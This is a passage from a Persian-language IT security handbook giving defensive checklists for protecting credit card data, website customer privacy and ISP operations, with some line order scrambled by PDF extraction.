ﺍﮔﺮ ﺳﻮﺍﺑﻘﻲ ﺷﺎﻣﻞ ﺩﺍﺩﻩﻫﺎﻱ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﺑـﻪ
ﭼﺎﭖ ﻣﻲﺭﺳﺎﻧﻴﺪ ،ﺍﺯ ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻣﻨﻴﺖ
ﺁﻧﻬﺎ ﺭﺍ ﺗﺄﻣﻴﻦ ﻛﻨﻴﺪ ﻭ ﺑﻼﻓﺎﺻﻠﻪ ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺩﻳﮕﺮ
ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻧﺒﻮﺩﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎ ﺩﺳﺘﮕﺎﻩ ﻛﺎﻏﺬﺧﺮﺩﻛﻦ ﺍﺯ
ﺑﻴﻦ ﺑﺒﺮﻳﺪ.
•
ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﻌﺘﺒﺮ ،ﭼﻨﺪ ﻛﺘﺎﺏ ﺑﻪﺭﻭﺯ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ
ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺨﺮﻳﺪ ،ﺁﻧﻬﺎ ﺭﺍ ﻣـﻮﺭﺩ ﻣﻄﺎﻟﻌـﻪ
ﻗــﺮﺍﺭ ﺩﻫﻴــﺪ ،ﻭ ﺗﻮﺻــﻴﻪﻫﺎﻳــﺸﺎﻥ ﺭﺍ ﺩﻧﺒــﺎﻝ ﻛﻨﻴــﺪ.
ﺍﻧﺘــﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠــﻲ ﻭ ﺷــﺮﻛﺎ ،٢٠١ﺟــﺎﻥ ﻭﺍﻳﻠــﻲ ﻭ
201 O'Reilly & Associates
ﭘﺴﺮﺍﻥ ،٢٠٢ﻭ ﻣﻚ ﮔﺮﻭﻫﻴﻞ ٢٠٣ﻛﺘﺎﺑﻬﺎﻱ ﺧﻮﺑﻲ ﺩﺭ
ﺑﺎﺏ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﻨﺘـﺸﺮ ﻛـﺮﺩﻩﺍﻧـﺪ.
ﻗﻴﻤﺖ ﺍﻳﻦ ﻛﺘﺎﺑﻬﺎ ﺑﺴﺘﻪ ﺑـﻪ ﻣﺤـﻞ ﺯﻧـﺪﮔﻲ ﺷـﻤﺎ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺧﺮﻳـﺪ
ﻭ ﺍﺳــﺘﻔﺎﺩﺓ ﻣــﺆﺛﺮ ﺍﺯ ﺁﻧﻬــﺎ ﺳــﺮﻣﺎﻳﻪﮔــﺬﺍﺭﻱ ﺑــﺴﻴﺎﺭ
ﻣﻔﻴﺪﻱ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ.
ﺏ( ﺍﮔﺮ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻗﺎﺑـﻞ
ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ:
•
ﺗﻤﺎﻡ ﻧﻜﺎﺗﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻗﺒﻠﻲ ﮔﻔﺘﻪ ﺷـﺪ ،ﺑﻌـﻼﻭﺓ
ﻧﻜﺎﺕ ﺯﻳﺮ:
•
ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻧﺼﺐ ﻛﻨﻴﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ
ﺗﻨﻬﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣﺠﺎﺯ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ
ﺭﺍﻳﺎﻧــﻪ ﺩﺳﺘﺮﺳــﻲ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ ﻭ ﺍﺯ ﺩﺳﺘﺮﺳــﻲ
ﻋﻤﻮﻣﻲ ﺑﻪ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﺧﻮﺍﻫﺪ ﺷﺪ.
•
ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﺭﺍ ﺭﻭﻱ ﺗﻤـﺎﻡ ﺗﺠﻬﻴـﺰﺍﺕ
ﺷﺒﻜﻪ )ﻣـﺴﻴﺮﻳﺎﺑﻬﺎ ،ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ ،ﺳـﻮﺋﻴﭽﻬﺎ ،ﻭ (...
ﻧﺼﺐ ﻛﻨﻴﺪ.
•
ﺑﺮﺍﻱ ﻛﻠﻴﺔ ﭘﻴﺎﻣﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻛـﻪ
ﺭﻭﻱ ﺧﻂ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ.
•
ﻫﻤــﺔ ﺧــﺪﻣﺎﺕ ﺷــﺒﻜﻪﺍﻱ ﻏﻴﺮﺿــﺮﻭﺭﻱ )ﻣﺜــﻞ
ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ،Webﻓﺮﺍﺧــﻮﺍﻧﻲ ﺗــﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ،٢٠٤ﻭ
ﭘﺮﻭﺗﻜﻞ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ (٢٠٥ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ.
ﺝ( ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﺔ
ﺟﻬﺎﻧﻲ ﻭﺏ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ:
•
ﺗﻤﺎﻡ ﻧﻜﺎﺗﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻗﺒﻠﻲ ﮔﻔﺘﻪ ﺷـﺪ ،ﺑﻌـﻼﻭﺓ
ﻧﻜﺎﺕ ﺯﻳﺮ:
•
ﺍﻃﻼﻋــﺎﺕ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﻛــﺎﺭﺕ ﺍﻋﺘﺒــﺎﺭﻱ ﺭﺍ ﺩﺭ
ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ
ﻫﺴﺘﻨﺪ ﻗـﺮﺍﺭ ﻧﺪﻫﻴـﺪ .ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺭﻭﻱ ﺩﺳـﺘﮕﺎﻫﻲ
ﺩﻳﮕﺮ ﻭ ﭘﺸﺖ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﻗـﺮﺍﺭ ﺩﻫﻴـﺪ ﻭ ﺑـﺮﺍﻱ
John Wiley and Sons
Osborne / McGraw-Hill
)Remote Procedure Call (RPC
)File Transfer Protocol (FTP
202
203
204
205
٢٠٩
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﺍﺯ ﻓﺮﺍﺧـﻮﺍﻧﻲ ﺗـﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻳـﺎ
ﺳﺎﻳﺮ ﺭﻭﺷﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺑﻪ ﻫﻤـﺮﺍﻩ ﻳـﻚ ﺳﻴـﺴﺘﻢ
ﻏﺮﺑﺎﻝﺳﺎﺯ ﺧﻮﺏ ﺩﺭ ﺳﻄﺢ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ.
ﺩ(
•
ﺗﻤﺎﻡ ﺗﺮﺍﻛﻨـﺸﻬﺎﻱ ﺭﻭﻱ ﺷـﺒﻜﻪ ﺭﺍ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﻗﻮﻳﺘﺮﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻣﻮﺟﻮﺩ )ﺩﺭﺻـﻮﺭﺕ ﺍﻣﻜـﺎﻥ ﺑـﺎ
ﻛﻠﻴﺪ ۱۲۸ﺑﻴﺘﻲ( ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ.
•
ﺍﻃﻤﻴﻨــﺎﻥ ﺣﺎﺻــﻞ ﻛﻨﻴــﺪ ﻛــﻪ ﺍﻃﻼﻋــﺎﺕ ﻛــﺎﺭﺕ
ﺍﻋﺘﺒﺎﺭﻱ ﻛﻪ ﻣﻮﻗﺘﹰﺎ ﺩﺭ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﺓ ﻭﺏ ﺫﺧﻴـﺮﻩ
ﺷﺪﻩ ﺍﺳﺖ ،ﺑﻼﻓﺎﺻﻠﻪ ﭘﺲ ﺍﺯ ﺍﺗﻤﺎﻡ ﺗﺮﺍﻛﻨﺶ ﭘـﺎﻙ
ﻣﻲﺷﻮﺩ.
•
ﺗﻤﺎﻣﻲ ﻣﻮﺍﺭﺩ ﺑﺎﻻ ﺭﺍ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ ،ﺍﻣﺎ ﺑﺎ ﻫﻮﺷـﻴﺎﺭﻱ
ﺑﻴﺸﺘﺮﻱ ﻧﺴﺒﺖ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ .ﺁﻥ ﺭﺍﻳﺎﻧـﻪ،
ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺁﻥ ،ﻭ ﮔﺰﺍﺭﺷـﻬﺎﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎ ﺑﺎﻳـﺪ ﺑـﻪ
ﺩﻗﺖ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺩﺍﺋﻤﻲ ﺑﺎﺷﻨﺪ.
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺸﺘﺮﻱ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ
ﺩﺭ ﺍﻳﻨﺠﺎ ﻳﻚ ﺭﻭﺵ ﺳﺎﺩﻩ ﺍﻣﺎ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﺫﻛﺮ ﺷﺪﻩ ﻛـﻪ ﺁﻧـﺮﺍ ﺑـﻪ
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺑﻲ ﻛﻪ ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﻨـﺪ
ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨﻴﻢ .ﺩﺭ ﺻـﻔﺤﺔ ﺍﻭﻝ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺧـﻮﺩ ﺩﺭ ﻣـﻮﺭﺩ
ﺳﻴﺎﺳﺘﻬﺎﻳﺘﺎﻥ ﺩﺭ ﻗﺒﺎﻝ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺑﻪ ﺍﻓﺮﺍﺩ ﺗﻮﺿﻴﺢ ﺩﻫﻴﺪ ،ﻭ
ﺍﮔﺮ ﻧﻘﻄﺔ ﺍﺑﻬﺎﻣﻲ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺎﺳﺘﻬﺎﻳﺘﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺟﺎﺯﻩ ﺩﻫﻴـﺪ
ﺷﺮﻛﺘﺘﺎﻥ ﺗﻮﺳﻂ ﻣﻤﻴﺰﻫﺎﻳﻲ ﺍﺯ ﺧﺎﺭﺝ ﺷﺮﻛﺖ ﻣﻮﺭﺩ ﺑﺎﺯﺑﻴﻨﻲ ﻗـﺮﺍﺭ
ﮔﻴﺮﺩ.
•
ﺟﻬــﺖ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ،ﺍﺷــﺨﺎﺹ ﺭﺍ ﻣﻠــﺰﻡ ﺑــﻪ
ﺛﺒﺖﻧﺎﻡ ﻭ ﻭﺭﻭﺩ ﺍﻃﻼﻋﺎﺕ ﺍﺿﺎﻓﻲ ﻧﻜﻨﻴﺪ.
•
ﺍﮔﺮ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻼﻗﻪ ﻣﻨﺪ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺑﻮﻟﺘﻦ ﻫﺴﺘﻨﺪ ،ﺍﺟـﺎﺯﻩ
ﺩﻫﻴــﺪ ﻛــﻪ ﺑــﺮﺍﻱ ﺛﺒــﺖ ﻧــﺎﻡ ﺗﻨﻬــﺎ ﺍﺯ ﺁﺩﺭﺱ ﭘــﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
•
ﻫﺮﮔﺎﻩ ﻧﺎﻣﻪﺍﻱ ﺑﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﺍﺭﺳـﺎﻝ ﻣـﻲﻛﻨﻴـﺪ ،ﺑـﻪ ﺁﻧﻬـﺎ
ﺗﻮﺿﻴﺢ ﺩﻫﻴﺪ ﻛﻪ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺁﻧﻬـﺎ ﺭﺍ ﭼﮕﻮﻧـﻪ ﺑﺪﺳـﺖ
ﺁﻭﺭﺩﻩﺍﻳــﺪ ﻭ ﺁﻧﻬــﺎ ﭼﮕﻮﻧــﻪ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺁﺩﺭﺱ ﺧــﻮﺩ ﺭﺍ ﺍﺯ
ﻓﻬﺮﺳﺖ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ ﻧﺎﻣﻪﻫﺎﻱ ﺷﻤﺎ ﺣﺬﻑ ﻛﻨﻨﺪ.
•
ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ ﻗـﺮﺍﺭ ﻧﺪﻫﻴـﺪ ﻭ
ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ.
•
ﺯﻣﺎﻧﻴﻜﻪ ﺩﻳﮕﺮ ﻧﻴﺎﺯﻱ ﺑﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﻧﺪﺍﺭﻳـﺪ ،ﺁﻧﻬـﺎ ﺭﺍ
ﭘﺎﻙ ﻛﻨﻴﺪ.
•
ﺍﮔﺮ ﻻﺯﻡ ﺍﺳﺖ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﺑـﺮﺍﻱ ﻣـﺪﺕ ﺯﻳـﺎﺩﻱ ﺍﺯ
ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳـﻲ ﺑﺎﺷـﻨﺪ ،ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ
ﺑﺎﻋﺚ ﺷﻨﺎﺳﺎﻳﻲ ﺍﺷﺨﺎﺹ ﻣﻲﺷـﻮﺩ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺁﻥ ﺣـﺬﻑ
ﻛﻨﻴﺪ.
•
ﻧﺎﻗﻀﺎﻥ ﺳﻴﺎﺳﺖ ﺣﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﺭﺍ ﺗﺄﺩﻳـﺐ ﻳـﺎ ﺍﺧـﺮﺍﺝ
ﻧﻤﺎﻳﻴﺪ.
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ISPﻫﺎ
ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﻧﺴﺒﺖ ﺑﻪ ﺁﻧﭽﻪ ﻛﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ISPﻫـﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ ﻣﻔﺼﻞﺗـﺮ ﺍﺳـﺖ ،ﺍﻣـﺎ ﺑـﺴﻴﺎﺭ ﺍﻫﻤﻴـﺖ ﺩﺍﺭﺩ ﻛـﻪ ﻫﻤـﺔ
ﮔﺰﻳﻨﻪﻫﺎ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ ﺗﺼﻤﻴﻢ ﻋﺎﻗﻼﻧـﻪﺍﻱ ﺩﺭﺑـﺎﺭﺓ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻧﻬﺎ ﺍﺗﺨﺎﺫ ﮔﺮﺩﺩ.
•
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﮔﺎﻫﻲ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﻳـﺎ ﺳـﺎﻳﺮ
ﺍﻃﻼﻋﺎﺕ ﻣﺎﻟﻲ ﻣﺸﺘﺮﻱ ﺭﺍ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻴﺪ ،ﺗﻤﺎﻡ ﻗـﻮﺍﻧﻴﻦ
ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﻳﺪ ﺍﻋﻤﺎﻝ ﺷﻮﻧﺪ.
•
ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺑﻲﺿﺎﺑﻄﻪ ﻳﺎ ﻛﻠﻴﺸﻪﺍﻱ ﻧﻴﺴﺖ.
ﻣﻮﺿﻮﻋﺎﺕ ﻣﺨﺘﻠﻒ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﺪ ﻭ ﺑﺮﺍﻱ ﻫﺮﻳﻚ ﻃﺮﺣﻲ
ﻛﻠﻲ ﺑﺮﻳﺰﻳﺪ.
•
ﻳﻚ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ ﺷـﺎﻣﻞ :ﻣﻴـﺰﺍﻥ ﺗﻌﻬـﺪ
ﺷﻤﺎ ﺑﻪ ﻣﺤﺮﻣﺎﻧـﻪ ﻣﺎﻧـﺪﻥ ﺍﻃﻼﻋـﺎﺕ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ
ﻣﺸﺘﺮﻳﺎﻥ )ﺩﺭ ﻣﻘﺎﺑﻞ ﺩﺳﺘﺮﺳـﻲ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺧـﻮﺩ ﻳـﺎ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﺩﻳﮕﺮ(؛ ﻭ ﺭﻭﻧﺪﻫﺎﻱ ﮔﺰﺍﺭﺵﺩﻫﻲ ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻳﻚ ﺣﻤﻠـﺔ
ﺑﺨﺶ ﺳﻮﻡ
ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺣﺘﻤـ ﹰﺎ ﺑﺎﻳـﺪ ﺭﻭﻱ
ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ:
•
ﺑﺪﻭﻥ ﺍﺟﺎﺯﺓ ﺻﺮﻳﺢ ﻛـﺎﺭﺑﺮ ،ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ
ﺍﻃﻼﻋﺎﺕ ﺷﺨـﺼﻲ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﺩﻳﮕﺮ ﻧﮕﺬﺍﺭﻳﺪ.
٢١٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﻣﻨﻴﺘﻲ )ﮔﺰﺍﺭﺵ ﺑﻪ ﻋﻮﺍﻣﻞ ﺩﺍﺧﻠـﻲ ﺳـﺎﺯﻣﺎﻥ ،ﺑـﻪ ISPﻫـﺎ ،ﻭ ﻧﻴـﺰ
•
ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ(
•
ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺧـﻮﺩ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻛﻨﻴـﺪ )ﺁﻳـﺎ ﺗﻨﻬـﺎ
ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﻆ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺷﻤﺎﺳﺖ ،ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺍ ﺗﺎ ﭼﻪ ﻣﺪﺕ
،ftp ،icq ،fingerﻛﺎﻣﭙﺎﻳﻠﺮﻫـﺎ ﻭ (...ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻗﺎﺑـﻞ
ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ،ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ.
•
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻫﻤﺔ ﺩﺳـﺘﮕﺎﻫﻬﺎ -ﺧـﺼﻮﺻﹰﺎ ﺁﻧﻬـﺎﻳﻲ
ﻛــﻪ ﻗﺎﺑــﻞ ﺍﺗــﺼﺎﻝ ﺑــﻪ ﺍﻳﻨﺘﺮﻧــﺖ ﻫــﺴﺘﻨﺪ -ﺑــﺎ ﺍﻋﻤــﺎﻝ
ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻪ ﻣﻲﺷﻮﻧﺪ.
•
ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﻨﺘﺮﻝ ﻣﺪﺍﻭﻡ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﺗـﺎ ﺑﺘﻮﺍﻧﻴـﺪ
ﻣــﺸﻜﻼﺗﻲ ﺍﺯ ﻗﺒﻴــﻞ ﺣﻤــﻼﺕ ﺗﺨﺮﻳــﺐ ﺳــﺮﻭﻳﺲ ﻭ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻋﻤﺪﺓ ﻭﻳﺮﻭﺳـﻬﺎ ﻭ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﺭﺍ ﺗـﺸﺨﻴﺺ
ﺩﻫﻴﺪ .ﺍﻳﻦ ﻧﻴﺎﺯﻣﻨﺪ ﺁﻥ ﺍﺳﺖ ﻛـﻪ ﻗـﺎﺩﺭ ﺑﺎﺷـﻴﺪ ﺍﻟﮕﻮﻫـﺎﻱ
ﻃﺒﻴﻌﻲ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﺪ.
•
ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻗﺎﺑﻠﻴﺖ ﻛﻨﺘﺮﻝ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﺗﺎ ﺑﻬﺘﺮ ﺑﺘﻮﺍﻧﻴـﺪ
ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ )ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ
ﻭ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ(.
•
ﻭﻳﺮﻭﺱﻳﺎﺏﻫﺎ ﺭﺍ ﺩﺭ ﻫﺮ ﺟﺎﻳﻲ ﻛﻪ ﻭﺭﻭﺩ ﻳﺎ ﺧﺮﻭﺝ ﭘـﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ ﻧﺼﺐ ﻛﻨﻴﺪ.
•
ﺑﺎ ﺗﻬﻴﻪ ﺿﺪﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﮕﺎﻥ ﻳﺎ ﺍﺭﺯﺍﻥﻗﻴﻤﺖ ،ﻣـﺸﺘﺮﻳﺎﻥ
ﺧﻮﺩ ﺭﺍ ﺗﺮﻏﻴﺐ ﻛﻨﻴﺪ ﻛﻪ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩ ﺭﺍ ﺍﻳﻤﻦ ﺳﺎﺯﻧﺪ.
•
ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ
ﻳﻚ ﺗﻮﺯﻳﻊﻛﻨﻨﺪﺓ ﻫﺮﺯﻧﺎﻣﻪ ﺗﺒﺪﻳﻞ ﻧﺸﻮﺩ.
•
ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ.
•
ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻭ ﺑﺮﻗﺮﺍﺭﻱ ﻭ ﻗﻄـﻊ
ﺍﺗﺼﺎﻝ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﺛﺒﺖ ﻛﻨﻴـﺪ ﺗـﺎ ﺗﻮﺍﻧـﺎﻳﻲ ﺧـﻮﺩ ﺑـﺮﺍﻱ
ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻗﺎﻧﻮﻧﻲ ﻋﻠﻴـﻪ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺭﺍ ﺍﻓـﺰﺍﻳﺶ
ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ.
•
ﺍﺯ ﺭﻭﺍﻟﻬﺎﻱ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺧـﻮﺩ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ
ﻣﺠﻤﻮﻋﻪﺍﻱ ﺳﺨﺘﮕﻴﺮﺍﻧﻪ ﻭ ﻫﻤﭙﻮﺷﺎﻥ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ.
•
ﻭﺻـــﻠﻪﻫـــﺎﻱ ﺍﻣﻨﻴﺘـــﻲ ﺭﺍ downloadﻭ ﺍﺯ ﻃﺮﻳـــﻖ
